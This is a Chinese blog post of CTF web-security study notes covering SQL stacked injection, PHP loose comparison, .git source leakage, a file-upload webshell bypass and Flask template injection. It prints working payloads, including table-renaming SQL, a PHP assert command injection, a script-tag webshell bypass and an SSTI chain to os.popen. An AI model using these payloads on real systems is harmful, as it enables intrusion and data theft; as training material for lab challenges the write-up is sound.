<!DOCTYPE html>
<html lang="zh-hans">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"su29029.github.io","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="继续总结。">
<meta property="og:type" content="article">
<meta property="og:title" content="20200315学习总结">
<meta property="og:url" content="https://su29029.github.io/2020/08/28/20200315%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93/index.html">
<meta property="og:site_name" content="su29029的博客">
<meta property="og:description" content="继续总结。">
<meta property="og:locale">
<meta property="og:image" content="https://su29029.github.io/images/img/20200315学习总结/20200315学习总结1.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200315学习总结/20200315学习总结2.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200315学习总结/20200315学习总结3.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200315学习总结/20200315学习总结4.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200315学习总结/20200315学习总结5.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200315学习总结/20200315学习总结6.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200315学习总结/20200315学习总结7.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200315学习总结/20200315学习总结8.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200315学习总结/20200315学习总结9.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200315学习总结/20200315学习总结10.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200315学习总结/20200315学习总结11.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200315学习总结/20200315学习总结12.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200315学习总结/20200315学习总结13.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200315学习总结/20200315学习总结14.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200315学习总结/20200315学习总结15.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200315学习总结/20200315学习总结16.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200315学习总结/20200315学习总结17.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200315学习总结/20200315学习总结18.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200315学习总结/20200315学习总结19.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200315学习总结/20200315学习总结20.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200315学习总结/20200315学习总结21.jpg">
<meta property="article:published_time" content="2020-08-28T02:34:05.000Z">
<meta property="article:modified_time" content="2020-08-28T09:06:41.431Z">
<meta property="article:author" content="su29029">
<meta property="article:tag" content="web安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://su29029.github.io/images/img/20200315学习总结/20200315学习总结1.jpg">

<link rel="canonical" href="https://su29029.github.io/2020/08/28/20200315%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-hans'
  };
</script>

  <title>20200315学习总结 | su29029的博客</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">su29029的博客</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">因为心在那里</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>About</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-hans">
    <link itemprop="mainEntityOfPage" href="https://su29029.github.io/2020/08/28/20200315%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="su29029">
      <meta itemprop="description" content="因为心在那里">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="su29029的博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          20200315学习总结
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2020-08-28 10:34:05 / Modified: 17:06:41" itemprop="dateCreated datePublished" datetime="2020-08-28T10:34:05+08:00">2020-08-28</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web/" itemprop="url" rel="index"><span itemprop="name">web</span></a>
                </span>
                  , 
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web/web%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">web安全</span></a>
                </span>
            </span>

          
            <span id="/2020/08/28/20200315%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93/" class="post-meta-item leancloud_visitors" data-flag-title="20200315学习总结" title="Views">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">Views: </span>
              <span class="leancloud-visitors-count"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="fa fa-comment-o"></i>
      </span>
      <span class="post-meta-item-text">Valine: </span>
    
    <a title="valine" href="/2020/08/28/20200315%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2020/08/28/20200315%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93/" itemprop="commentCount"></span>
    </a>
  </span>
  
  <br>
            <span class="post-meta-item" title="Symbols count in article">
              <span class="post-meta-item-icon">
                <i class="fa fa-file-word-o"></i>
              </span>
                <span class="post-meta-item-text">Symbols count in article: </span>
              <span>11k字</span>
            </span>
            <span class="post-meta-item" title="Reading time">
              <span class="post-meta-item-icon">
                <i class="fa fa-clock-o"></i>
              </span>
                <span class="post-meta-item-text">Reading time &asymp;</span>
              <span>10 mins.</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>继续总结。</p>
<a id="more"></a>
<h3 id="sql堆叠注入-stack-injection"><a href="#sql堆叠注入-stack-injection" class="headerlink" title="sql堆叠注入[stack injection]"></a>sql堆叠注入[stack injection]</h3><p>sql注入中，当我们无法使用select等查询语句时[通常来说是被过滤了]，我们可以考虑尝试堆叠注入。所谓堆叠注入，顾名思义，就是一次性执行多条sql语句。我们知道sql语句以分号<code>;</code>结束，故如果我们使用分号提前结束前一条sql语句，然后再在分号后面执行我们想执行的语句，最后注释掉原本后面的sql语句段，就能实现堆叠注入的效果，从而造成了sql注入。<br>不过sql堆叠注入的利用条件有限，通常只有在后台sql允许一次执行多条语句时才能利用。以一个题来举例子：<br>题目链接：<a target="_blank" rel="noopener" href="https://adworld.xctf.org.cn/task/answer?type=web&amp;number=3&amp;grade=1&amp;id=5417&amp;page=1">https://adworld.xctf.org.cn/task/answer?type=web&amp;number=3&amp;grade=1&amp;id=5417&amp;page=1</a><br>拿到题目先尝试<code>&#39;</code>发现sql报错，故判断存在sql注入点。随后<code>1&#39;or &#39;1&#39;=&#39;1</code>，发现有回显，随后借助<code>order by</code>发现有两列，但尝试union select查询时发现了下面这条提示：<br><img src="/images/img/20200315学习总结/20200315学习总结1.jpg"><br>发现select，update，drop等等关键词都被过滤了，而且发现通过大小写，加注释等方式无法绕过，故只能放弃这一注入方式。随后尝试堆叠注入。<br>尝试显示一下所有数据库和所有数据表。<br><img src="/images/img/20200315学习总结/20200315学习总结2.jpg"><br><img src="/images/img/20200315学习总结/20200315学习总结3.jpg"><br>随后显示出words表和1919810931114514表的列：<br><img src="/images/img/20200315学习总结/20200315学习总结4.jpg"><br><img src="/images/img/20200315学习总结/20200315学习总结5.jpg"><br>发现在19198109931114514表中存在我们想要的flag，且查询的时候是查询words表里的id，故我们尝试更改表名并把flag列名修改成id列名，19198109931114514表名修改成words表名。<br>最终payload：<code>1&#39;;rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100)</code><br><img src="/images/img/20200315学习总结/20200315学习总结6.jpg"><br>最后通过<code>1&#39;or &#39;1&#39;=&#39;1 #</code>得到flag。<br><img src="/images/img/20200315学习总结/20200315学习总结7.jpg">  </p>
<h3 id="php-弱类型比较"><a href="#php-弱类型比较" class="headerlink" title="php == 弱类型比较"></a>php == 弱类型比较</h3><p>php中有两种比较方式，<code>==</code>和<code>===</code>，其中==在进行比较的时候，会先将字符串类型转化成相同，再比较，而===在进行比较的时候，会先判断两种字符串的类型是否相等，再比较。举几个例子：<br><img src="/images/img/20200315学习总结/20200315学习总结8.jpg"><br>当php比较字符串和数字时，会将字符串向数字尝试转换，字符串的开始部分决定了它的值，如果该字符串以合法的数值开始，则使用该数值，否则值为0。但当字符串中出现.,e,E等字符时，如果字符前后都可转化为合法数字，则.会使字符串转化为小数，e,E会将字符串转换为科学计数法表示的数字。布尔值和数字比较时，true和大于等于1的数弱类型相等，false和0相等。  </p>
<h3 id="git源码泄露"><a href="#git源码泄露" class="headerlink" title="git源码泄露"></a>git源码泄露</h3><p>git是一个是一个开源的分布式版本控制系统，可以有效、高速地处理从很小到非常大的项目版本管理。而初始化一个git目录时，会产生一个.git的文件夹，如果没有处理好则会造成git源码泄露。git源码可以通过GitHack来获取文件。以一个题目来举例子。<br>题目链接：<a target="_blank" rel="noopener" href="https://adworld.xctf.org.cn/task/answer?type=web&amp;number=3&amp;grade=1&amp;id=5002&amp;page=1">https://adworld.xctf.org.cn/task/answer?type=web&amp;number=3&amp;grade=1&amp;id=5002&amp;page=1</a><br>拿到题目收集一下信息，F12发现element的注释里有个flag，访问发现为空。发现about页面提示使用了git，判断存在git源码泄露。<br><img src="/images/img/20200315学习总结/20200315学习总结9.jpg"><br>访问/.git/目录，发现果然存在git源码泄露。<br><img src="/images/img/20200315学习总结/20200315学习总结10.jpg"><br>随后使用<a target="_blank" rel="noopener" href="https://github.com/lijiejie/GitHack">GitHack</a>将源码还原。<br><img src="/images/img/20200315学习总结/20200315学习总结11.jpg"><br>打开flag.php，发现内容是空的。<br><img src="/images/img/20200315学习总结/20200315学习总结12.jpg"><br>打开index.php看看，发现了关键代码：  </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">if (isset($_GET[&#39;page&#39;])) &#123;</span><br><span class="line">	$page &#x3D; $_GET[&#39;page&#39;];</span><br><span class="line">&#125; else &#123;</span><br><span class="line">	$page &#x3D; &quot;home&quot;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$file &#x3D; &quot;templates&#x2F;&quot; . $page . &quot;.php&quot;;</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F; I heard &#39;..&#39; is dangerous!</span><br><span class="line">assert(&quot;strpos(&#39;$file&#39;, &#39;..&#39;) &#x3D;&#x3D;&#x3D; false&quot;) or die(&quot;Detected hacking attempt!&quot;);</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F; TODO: Make this look nice</span><br><span class="line">assert(&quot;file_exists(&#39;$file&#39;)&quot;) or die(&quot;That file doesn&#39;t exist!&quot;);</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<img src="/images/img/20200315学习总结/20200315学习总结13.jpg">  
发现对page的内容只过滤了```..```，故尝试通过闭合连接字符串和执行系统命令来获取flag。故构造如下payload：```'.system("cat ./templates/flag.php").'```最后在注释里面获得flag。  
<img src="/images/img/20200315学习总结/20200315学习总结14.jpg">  

<h3 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h3><p>题目链接：<a target="_blank" rel="noopener" href="https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]Upload">https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]Upload</a></p>
<p>打开题目发现有一个文件上传的接口，随便上传一个1.jpg看看，发现提示Not Image。<br><img src="/images/img/20200315学习总结/20200315学习总结15.jpg"><br>修改请求，写入一句话木马，并修改文件名为1.php，再次上传，发现提示错误。<br><img src="/images/img/20200315学习总结/20200315学习总结16.jpg"><br>使用phtml后缀绕过，再次提交，依然发现错误。<br><img src="/images/img/20200315学习总结/20200315学习总结17.jpg"><br>说明后台对文件内容也进行了分析，提示发现<code>&lt;?</code>故尝试通过<code>&lt;script language=&quot;php&quot;&gt;&lt;/script&gt;</code>绕过，发现成功上传木马。<br><img src="/images/img/20200315学习总结/20200315学习总结18.jpg"><br>下面就简单了，使用蚁剑连接。然而发现直接连接/1.phtml会报错，故猜测/upload/1.phtml路径，发现成功连接。<br><img src="/images/img/20200315学习总结/20200315学习总结19.jpg"><br>(发现了好多不同的文件后缀，应该除了.phtml其他格式应该也能绕过吧，回头都试试嗯)<br>后面搜一搜服务器，flag就到手了。<br><img src="/images/img/20200315学习总结/20200315学习总结20.jpg">  </p>
<h3 id="python-flask-模板注入"><a href="#python-flask-模板注入" class="headerlink" title="python flask 模板注入"></a>python flask 模板注入</h3><p>python的flask框架使用Jinja2作为模板渲染引擎，如果render_template_string函数在渲染模板的时候使用了%s来动态的替换字符串，这里将造成ssti漏洞。Jinja2中<code>&#123;&#123;&#125;&#125;```是变量包裹标识符，它会将```&#123;&#123;&#125;&#125;</code>中的内容当作变量解析替换，如果我们的url中也含有<code>&#123;&#123;&#125;&#125;```的话，就会造成ssti。
> 吐槽一句，hexo的模板渲染引擎将我文章里的```&#123;&#123;&#125;&#125;</code>给编译掉了，然而我本意就是这个符号，感觉这里有bug…<br>以一个题目举例子：<br>题目链接：<a target="_blank" rel="noopener" href="https://adworld.xctf.org.cn/task/answer?type=web&amp;number=3&amp;grade=1&amp;id=5408&amp;page=1">https://adworld.xctf.org.cn/task/answer?type=web&amp;number=3&amp;grade=1&amp;id=5408&amp;page=1</a><br>打开题目提示python template injection，尝试发现表达式被执行，故存在ssti。<br><img src="/images/img/20200315学习总结/20200315学习总结21.jpg"><br>我们现在需要考虑借助这个ssti获得服务器的控制台权限。因为是python的框架，所以我们需要使用python来获取控制台权限，我们想到了<code>os.system</code>和<code>os.popen</code>两个方法，前者返回<strong>退出状态码</strong>，后者以<strong>file形式</strong>返回<strong>输出内容</strong>。这里我们要看到内容，故选择<code>os.popen</code>。    </p>
<p>那么怎么找到这个方法呢，python为我们提供了完整的查找链：  </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">__class__:返回对象所属类；</span><br><span class="line">__mro__:返回一个类所继承的基类元组，方法在解析按照元组的顺序解析；</span><br><span class="line">__base__:返回该类所继承的基类；</span><br><span class="line">__subclasses__:每个新类都保留了子类的引用，这个方法返回一个类中仍然可用的引用的列表；</span><br><span class="line">__init__:类的初始化方法；</span><br><span class="line">__globals__:对包含函数全局变量的字典的引用。</span><br><span class="line">&#96;&#96;&#96;  </span><br><span class="line"></span><br><span class="line">ok，我们可以开始操作了。  </span><br><span class="line">首先找到当前变量所在的类。</span><br></pre></td></tr></table></figure>
<p>‘’.<strong>class</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">服务器返回：  </span><br></pre></td></tr></table></figure>
<p>URL <a target="_blank" rel="noopener" href="http://111.198.29.45:59359/">http://111.198.29.45:59359/</a>&lt;type ‘str’&gt; not found</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">这个回复告诉我们，当前变量所在的类是str。   </span><br><span class="line">随后我们找到它的基类。   </span><br></pre></td></tr></table></figure>
<p>‘’.<strong>class</strong>.<strong>mro</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">服务器返回：  </span><br></pre></td></tr></table></figure>
<p>URL <a target="_blank" rel="noopener" href="http://111.198.29.45:59359/">http://111.198.29.45:59359/</a>(&lt;type ‘str’&gt;, &lt;type ‘basestring’&gt;, &lt;type ‘object’&gt;) not found</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">基类也有了。   </span><br><span class="line">下一步找到任意一个基类的引用列表。</span><br></pre></td></tr></table></figure>
<p>‘’.<strong>class</strong>.<strong>mro</strong>[2].<strong>subclasses</strong>()</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">服务器返回了一大串，我们找到os所在的&#96;&#96;&#96;site._Printer&#96;&#96;&#96;类，它在第72位，即&#96;&#96;&#96;__subclasses__()[71]&#96;&#96;&#96;。   </span><br><span class="line">于是我们可以开始读取命令行输出了。   </span><br></pre></td></tr></table></figure>
<p>‘’.<strong>class</strong>.<strong>mro</strong>[2].<strong>subclasses</strong>()[71].<strong>init</strong>.<strong>globals</strong>[‘os’].popen(‘ls’).read()</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">服务器返回：  </span><br></pre></td></tr></table></figure>
<p>URL <a target="_blank" rel="noopener" href="http://111.198.29.45:59359/fl4g">http://111.198.29.45:59359/fl4g</a> index.py not found</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">最后一步，读取fl4g。  </span><br></pre></td></tr></table></figure>
<p>‘’.<strong>class</strong>.<strong>mro</strong>[2].<strong>subclasses</strong>()[71].<strong>init</strong>.<strong>globals</strong>[‘os’].popen(‘cat fl4g’).read()</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">服务器返回：  </span><br></pre></td></tr></table></figure>
<p>URL <a target="_blank" rel="noopener" href="http://111.198.29.45:59359/ctf%7Bf22b6844-5169-4054-b2a0-d95b9361cb57%7D">http://111.198.29.45:59359/ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}</a> not found</p>
<pre><code>flag到手。  </code></pre>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/web%E5%AE%89%E5%85%A8/" rel="tag"># web安全</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/08/28/20200313%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93/" rel="prev" title="20200313学习总结">
      <i class="fa fa-chevron-left"></i> 20200313学习总结
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/08/28/sql%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93%EF%BC%88%E4%B8%80%EF%BC%89/" rel="next" title="sql注入总结（一）">
      sql注入总结（一） <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#sql%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5-stack-injection"><span class="nav-number">1.</span> <span class="nav-text">sql堆叠注入[stack injection]</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#php-%E5%BC%B1%E7%B1%BB%E5%9E%8B%E6%AF%94%E8%BE%83"><span class="nav-number">2.</span> <span class="nav-text">php &#x3D;&#x3D; 弱类型比较</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#git%E6%BA%90%E7%A0%81%E6%B3%84%E9%9C%B2"><span class="nav-number">3.</span> <span class="nav-text">git源码泄露</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0"><span class="nav-number">4.</span> <span class="nav-text">文件上传</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#python-flask-%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5"><span class="nav-number">5.</span> <span class="nav-text">python flask 模板注入</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="su29029"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">su29029</p>
  <div class="site-description" itemprop="description">因为心在那里</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">32</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">15</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/su29029" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;su29029" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:suyouqi29029@gmail.com" title="E-Mail → mailto:suyouqi29029@gmail.com" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">su29029</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="Reading time total">NaN:aN</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : false,
      appId      : 'avgOqaNA0MUU2UDrqoigHt2x-gzGzoHsz',
      appKey     : 'h482kh5MdsMAOaHP6IhmXaGV',
      placeholder: "Just go go",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : true,
      lang       : 'zh-cn' || 'zh-cn',
      path       : location.pathname,
      recordIP   : false,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
